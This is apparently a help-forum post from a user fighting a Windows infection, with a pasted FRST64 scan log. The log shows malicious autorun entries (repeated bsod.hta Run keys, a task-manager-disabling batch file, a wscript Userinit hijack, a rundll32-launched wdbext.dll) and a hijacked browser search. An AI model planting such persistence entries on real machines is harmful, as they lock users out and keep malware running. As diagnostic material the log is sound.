Komodia Rootkit - Desktop blank - Group Policy infected


This topic is locked
15 replies to this topic

#1 Ronins8

Posted 08 April 2016 - 10:24 AM

Hello! Until recently I've been able to combat any and all infections I've gotten, but this one is on another level!! I have run every piece of anti-malware out there but haven't been able to get back to 100%. I'm now not able to have a desktop when the computer loads, just a black screen, which I can only enable by CTRL+ALT+DEL, run Task Manager, File -> Run -> explorer.exe. This reloads my desktop, but the virus has added group policies which disable me as an admin. I also see a wsdscript.exe that is running in the background which I cannot get rid of because of the group policy (same with Windows Defender). Any help would be much appreciated :) Below is my FRST64 log, and the 'Addition' file that appeared when I ran the scan.

Attached files: FRST.txt (63.9KB), Addition.txt (73.37KB)

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:05-03-2016 01
Ran by RoNiN (administrator) on RONIN-LAPTOP (08-04-2016 10:28:19)
Running from C:\virus
Loaded Profiles: RoNiN & postgres (Available Profiles: RoNiN & postgres & DefaultAppPool)
Platform: Windows 10 Home (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Emsisoft Ltd) C:\Program Files\Emsisoft Anti-Malware\a2service.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome Remote Desktop\49.0.2623.40\remoting_host.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(MAGIX AG) C:\Program Files (x86)\Common Files\MAGIX Services\Database\bin\FABS.exe
(Micro-Star International Co., Ltd.) C:\Program Files (x86)\System Control Manager\MSIService.exe
(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
(Microsoft Corporation) C:\Program Files (x86)\Common Files\Microsoft Shared\VS7Debug\mdm.exe
(Microsoft Corporation) C:\Windows\System32\mqsvc.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
(Thrustmaster®) C:\Program Files\Thrustmaster\FFB Racing wheel\drivers\amd64\tmInstall.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome Remote Desktop\49.0.2623.40\remoting_host.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\pg_ctl.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\postgres.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\postgres.exe
(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\postgres.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\postgres.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\postgres.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\postgres.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.29.5\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.29.5\GoogleCrashHandler64.exe
(Microsoft Corporation) C:\Windows\System32\Taskmgr.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\mmc.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
 
 
==================== Registry (Whitelisted) ===========================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [ETDCtrl] => C:\Program Files\Elantech\ETDCtrl.exe [3738336 2015-10-31] (ELAN Microelectronics Corp.)
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [10816544 2010-05-25] (Realtek Semiconductor)
HKLM\...\Run: [THXCfg64] => C:\windows\system32\RunDLL32.exe C:\windows\system32\THXCfg64.dll,RunDLLEntry THXCfg64
HKLM\...\Run: [ETDWare] => C:\Program Files\Elantech\ETDCtrl.exe [3738336 2015-10-31] (ELAN Microelectronics Corp.)
HKLM\...\Run: [emsisoft anti-malware] => c:\program files\emsisoft anti-malware\a2guard.exe [9402680 2016-03-24] (Emsisoft Ltd)
HKLM-x32\...\Run: [IAStorIcon] => C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [284696 2010-04-13] (Intel Corporation)
HKLM-x32\...\Run: [MGSysCtrl] => C:\Program Files (x86)\System Control Manager\MGSysCtrl.exe [2486272 2010-06-04] (Micro-Star International Co., Ltd.)
HKLM-x32\...\Run: [THX Audio Control Panel] => C:\Program Files (x86)\Creative\THX TruStudio Pro\THXAudioCP\THXAudio.exe [1349632 2010-05-16] (Creative Technology Ltd)
HKLM-x32\...\Run: [CitrixReceiver] => "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Citrix\Receiver Updater.lnk"
HKLM-x32\...\Run: [TkBellExe] => "C:\Users\RoNiN\update\realsched.exe"  -osboot
HKLM-x32\...\Run: [ConnectionCenter] => C:\Program Files (x86)\Citrix\ICA Client\concentr.exe [407904 2015-04-08] (Citrix Systems, Inc.)
HKLM-x32\...\Run: [Redirector] => C:\Program Files (x86)\Citrix\ICA Client\redirector.exe [153952 2015-04-08] (Citrix Systems, Inc.)
HKLM-x32\...\Run: [win_en_77] => [X]
HKLM-x32\...\Run: [Rt562@] => C:\WINDOWS\Disable  task manager .bat
HKLM-x32\...\Run: [QwaT] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [Rty01] => C:\WINDOWS\call.vbs
HKLM-x32\...\Run: [TV] => C:\WINDOWS\TV
HKLM-x32\...\Run: [QwaT78] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [QwaT21] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [Rt45] => C:\WINDOWS\auto explore.bat
HKLM-x32\...\Run: [QwaT55] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [QwaT22] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [QwaTgg] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [QwaT5] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [QwaT4] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [QwaT1] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [BSOD] => C:\WINDOWS\bsod.hta
HKLM-x32\...\Run: [rst] => C:\WINDOWS\rst.bat
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [595480 2016-03-20] (Oracle Corporation)
HKLM-x32\...\RunOnce: [Malwarebytes Anti-Malware (cleanup)] => C:\ProgramData\Malwarebytes\Malwarebytes Anti-Malware\mbamdor.exe [55264 2016-03-10] (Malwarebytes)
HKLM-x32\...\RunOnce: [DeleteOnReboot] => C:\Users\RoNiN\AppData\Local\Temp\DeleteOnReboot.bat [134 2016-04-07] () <===== ATTENTION
HKLM\...\Winlogon: [Userinit] wscript,
Winlogon\Notify\igfxcui: C:\WINDOWS\SYSTEM32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\Run: [Google Update] => C:\Users\RoNiN\AppData\Local\Google\Update\GoogleUpdate.exe [144200 2015-08-28] (Google Inc.)
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\Run: [SideSync] => C:\Program Files (x86)\Samsung\SideSync4\SideSync.exe [9580864 2015-10-13] ()
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\Run: [MusicManager] => C:\Users\RoNiN\AppData\Local\Programs\Google\MusicManager\MusicManager.exe [7643136 2015-11-17] (Google Inc.)
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\Run: [wdbext] => rundll32.exe "C:\Users\RoNiN\AppData\Local\wdbext.dll",wdbext <===== ATTENTION
AppInit_DLLs: C:\ProgramData\AppxikenoZ\Volity.dll => No File
AppInit_DLLs-x32: C:\ProgramData\AppxikenoZ\Goldenphase.dll => No File
ShellIconOverlayIdentifiers: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => C:\Users\RoNiN\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll [2015-10-03] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => C:\Users\RoNiN\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll [2015-10-03] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => C:\Users\RoNiN\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll [2015-10-03] (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => C:\Users\RoNiN\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\FileSyncShell.dll [2015-10-03] (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => C:\Users\RoNiN\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\FileSyncShell.dll [2015-10-03] (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => C:\Users\RoNiN\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\FileSyncShell.dll [2015-10-03] (Microsoft Corporation)
GroupPolicy: Restriction - Chrome <======= ATTENTION
GroupPolicyScripts-x32\User: Restriction <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\..\Interfaces\{9cc31965-f3ac-45a8-a3c1-a9ad1c45f485}: [DhcpNameServer] 192.168.6.1 64.134.255.2 64.134.255.10
Tcpip\..\Interfaces\{c78fcb73-f14a-4b1e-b0ad-7bf0f8fa0b67}: [DhcpNameServer] 192.168.1.1
 
Internet Explorer:
==================
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-470165136-1162808608-978993673-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
SearchScopes: HKLM -> DefaultScope {A2516833-3348-406A-96A6-26AAA93BF9DE} URL = 
SearchScopes: HKLM -> OldSearch URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSITDF&pc=MAMI&src=IE-SearchBox
SearchScopes: HKLM-x32 -> {DF74C2BD-9885-45D2-AC3E-F2865A90DEAB} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSITDF&pc=MAMI&src=IE-SearchBox
SearchScopes: HKU\S-1-5-21-470165136-1162808608-978993673-1001 -> {0F462454-2A7D-48CE-B2B5-ECD4B55B6026} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKU\S-1-5-21-470165136-1162808608-978993673-1001 -> {A2516833-3348-406A-96A6-26AAA93BF9DE} URL = 
SearchScopes: HKU\S-1-5-21-470165136-1162808608-978993673-1001 -> {C9D867C8-1E65-4F71-970A-C677CAECFCC3} URL = hxxps://search.yahoo.com/search?p={searchTerms}&fr=yset_ie_syc_oracle&type=orcl_default
SearchScopes: HKU\S-1-5-21-470165136-1162808608-978993673-1001 -> {DF74C2BD-9885-45D2-AC3E-F2865A90DEAB} URL = 
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2012-09-23] (Adobe Systems Incorporated)
BHO-x32: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin.dll [2013-04-16] (RealDownloader)
BHO-x32: No Name -> {5C255C8A-E604-49b4-9D64-90988571CECB} -> No File
BHO-x32: Search Helper -> {6EBF7485-159F-4bff-A14F-B9E3AAC4465B} -> C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Search Helper\SEPsearchhelperie.dll [2010-01-14] (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_77\bin\ssv.dll [2016-03-29] (Oracle Corporation)
BHO-x32: Skype Plug-In -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll [2010-11-22] (Skype Technologies S.A.)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_77\bin\jp2ssv.dll [2016-03-29] (Oracle Corporation)
BHO-x32: Windows Live Toolbar Helper -> {E15A8DC0-8516-42A1-81EA-DC94EC1ACF10} -> C:\Program Files (x86)\Windows Live\Toolbar\wltcore.dll [2009-02-06] (Microsoft Corporation)
DPF: HKLM-x32 {02BCC737-B171-4746-94C9-0D8A0B2C0089} hxxp://office.microsoft.com/sites/production/ieawsdc32.cab
DPF: HKLM-x32 {67DABFBF-D0AB-41FA-9C46-CC0F21721616} hxxp://download.divx.com/player/DivXBrowserPlugin.cab
DPF: HKLM-x32 {6C269571-C6D7-4818-BCA4-32A035E8C884} hxxp://ccfiles.creative.com/Web/softwareupdate/su/ocx/15101/CTSUEng.cab
DPF: HKLM-x32 {E2883E8F-472F-4FB0-9522-AC9BF37916A7} hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
DPF: HKLM-x32 {F27237D7-93C8-44C2-AC6E-D6057B9A918F} hxxps://connect.bedbath.com/dana-cached/sc/JuniperSetupClient.cab
DPF: HKLM-x32 {F6ACF75C-C32C-447B-9BEF-46B766368D29} hxxp://ccfiles.creative.com/Web/softwareupdate/su/ocx/15112/CTPID.cab
Handler-x32: cdo - {CD00020A-8B95-11D1-82DB-00C04FB1625D} - C:\Program Files (x86)\Common Files\Microsoft Shared\Web Folders\PKMCDO.DLL [2001-01-22] (Microsoft Corporation)
Handler-x32: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8089.0726.dll [2009-07-26] (Microsoft Corporation)
Handler-x32: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8089.0726.dll [2009-07-26] (Microsoft Corporation)
Handler-x32: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll [2010-11-22] (Skype Technologies S.A.)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll [2013-02-26] (Skype Technologies)
Filter-x32: application/x-ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
 
FireFox:
========
FF Plugin: @adobe.com/FlashPlayer -> C:\windows\system32\Macromed\Flash\NPSWF64_16_0_0_305.dll [2015-02-06] ()
FF Plugin: @esn/npbattlelog,version=2.6.2 -> C:\Program Files (x86)\Battlelog Web Plugins\2.6.2\npbattlelogx64.dll [2015-01-13] (EA Digital Illusions CE AB)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.40416.0\npctrl.dll [2015-04-16] ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\windows\SysWOW64\Macromed\Flash\NPSWF32_16_0_0_305.dll [2015-02-06] ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2014-02-18] ()
FF Plugin-x32: @Citrix.com/npican -> C:\Program Files (x86)\Citrix\ICA Client\npicaN.dll [2015-04-08] (Citrix Systems, Inc.)
FF Plugin-x32: @esn/npbattlelog,version=2.6.2 -> C:\Program Files (x86)\Battlelog Web Plugins\2.6.2\npbattlelog.dll [2015-01-13] (EA Digital Illusions CE AB)
FF Plugin-x32: @Google.com/GoogleEarthPlugin -> C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll [2013-10-07] (Google)
FF Plugin-x32: @java.com/DTPlugin,version=11.77.2 -> C:\Program Files (x86)\Java\jre1.8.0_77\bin\dtplugin\npDeployJava1.dll [2016-03-29] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.77.2 -> C:\Program Files (x86)\Java\jre1.8.0_77\bin\plugin2\npjp2.dll [2016-03-29] (Oracle Corporation)
FF Plugin-x32: @messenger.yahoo.com/YahooMessengerStatePlugin;version=1.0.0.6 -> C:\Program Files (x86)\Yahoo!\Shared\npYState.dll [2011-06-16] (Yahoo! Inc.)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.40416.0\npctrl.dll [2015-04-15] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=14.0.8081.0709 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2009-07-10] (Microsoft Corporation)
FF Plugin-x32: @Motive.com/NpMotive,version=1.0 -> C:\Program Files (x86)\Common Files\Motive\npMotive.dll [2010-11-08] (Alcatel-Lucent)
FF Plugin-x32: @real.com/nppl3260;version=16.0.2.32 -> C:\Users\RoNiN\Netscape6\nppl3260.dll [2013-07-11] (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprndlchromebrowserrecordext;version=1.3.2 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlchromebrowserrecordext.dll [2013-04-16] (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprndlhtml5videoshim;version=1.3.2 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlhtml5videoshim.dll [2013-04-16] (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprndlpepperflashvideoshim;version=1.3.2 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlpepperflashvideoshim.dll [2013-04-16] (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprpplugin;version=16.0.2.32 -> C:\Users\RoNiN\Netscape6\nprpplugin.dll [2013-07-11] (RealPlayer)
FF Plugin-x32: @realnetworks.com/npdlplugin;version=1 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\npdlplugin.dll [2013-04-16] (RealDownloader)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-01-31] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-01-31] (Google Inc.)
FF Plugin-x32: @veetle.com/veetleCorePlugin,version=0.9.18 -> C:\Program Files (x86)\Veetle\plugins\npVeetle.dll [2010-10-15] (Veetle Inc)
FF Plugin-x32: @veetle.com/veetlePlayerPlugin,version=0.9.18 -> C:\Program Files (x86)\Veetle\Player\npvlc.dll [2010-09-21] (Veetle Inc)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2013-02-15] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-470165136-1162808608-978993673-1001: @nds.com/PlayerPlugin -> C:\Users\RoNiN\AppData\Local\DIRECTV Player\npPlayerPlugin.dll [2014-03-26] (DIRECTV)
FF Plugin HKU\S-1-5-21-470165136-1162808608-978993673-1001: @tools.google.com/Google Update;version=3 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-01] (Google Inc.)
FF Plugin HKU\S-1-5-21-470165136-1162808608-978993673-1001: @tools.google.com/Google Update;version=9 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-01] (Google Inc.)
FF Plugin HKU\S-1-5-21-470165136-1162808608-978993673-1001: NDS.com/PlayerPlugin -> C:\Users\RoNiN\AppData\Local\DIRECTV Player\npPlayerPlugin.dll [2014-03-26] (DIRECTV)
FF HKLM-x32\...\Firefox\Extensions: [{27182e60-b5f3-411c-b545-b44205977502}] - C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Search Helper\firefoxextension\SearchHelperExtension
FF Extension: Search Helper Extension - C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Search Helper\firefoxextension\SearchHelperExtension [2010-10-26] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [quickprint@hp.com] - C:\Program Files (x86)\Hewlett-Packard\SmartPrint\QPExtension
FF Extension: SmartPrintButton - C:\Program Files (x86)\Hewlett-Packard\SmartPrint\QPExtension [2011-01-26] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{FCE04E1F-9378-4f39-96F6-5689A9159E45}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext
FF Extension: RealDownloader - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext [2013-07-11] [not signed]
 
Chrome: 
=======
CHR HomePage: Default -> hxxp://www.google.com/
CHR DefaultSearchURL: Default -> hxxp://www-searching.com/search.aspx?site=shdefault&prd=smw&pid=s&shr=d&q={searchTerms}&s=Unknown
CHR DefaultSearchKeyword: Default -> www-searching.com
CHR DefaultSuggestURL: Default -> hxxp://api.searchpredict.com/api/?rqtype=ffplugin&siteID=8661&dbCode=1&command={searchTerms}
CHR Profile: C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-10-09]
CHR Extension: (Google Drive) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-10-28]
CHR Extension: (YouTube) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-26]
CHR Extension: (Google Search) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-28]
CHR Extension: (MightyText - SMS from PC & Text from Computer) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkfhfaphfkopdgpbfkebjfcblcafcmpi [2016-01-13]
CHR Extension: (Google Cast (Beta)) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\dliochdbjfkdbacpmhlcpmleaejidimm [2016-03-22]
CHR Extension: (Google Calendar) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\ejjicmeblgpmajnghnpcppodonldlgfn [2015-10-12]
CHR Extension: (Google Play Music) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\fahmaaghhglfmonjliepjlchgpgfmobi [2016-04-07]
CHR Extension: (Google Sheets) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-11-11]
CHR Extension: (Chrome Remote Desktop) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\gbchcmhmhahfdphkhkmpfmihenigjmpp [2016-03-02]
CHR Extension: (Google Cast (Beta)) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\gdijeikdkaembjbdobgfkoidjkpbmlkd [2016-03-02]
CHR Extension: (Google Docs Offline) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-03-22]
CHR Extension: (Google Keep - notes and lists) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\hmjkmjkepdijhoojdojkdfohbdgmmhki [2016-04-07]
CHR Extension: (Facebook Album & Photo Manager) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\lgiedegfmekolcplboelnmfoiefpcpfg [2015-08-15]
CHR Extension: (drumbit) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\mplpmdejoamenolpcojgegminhcnmibo [2016-02-03]
CHR Extension: (WeatherBug) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\njkkjobcechefaoknodniidfjapgfoco [2015-10-12]
CHR Extension: (Chrome Web Store Payments) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-08-15]
CHR Extension: (Picasa) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\onlgmecjpnejhfeofkgbfgnmdlipdejb [2015-08-15]
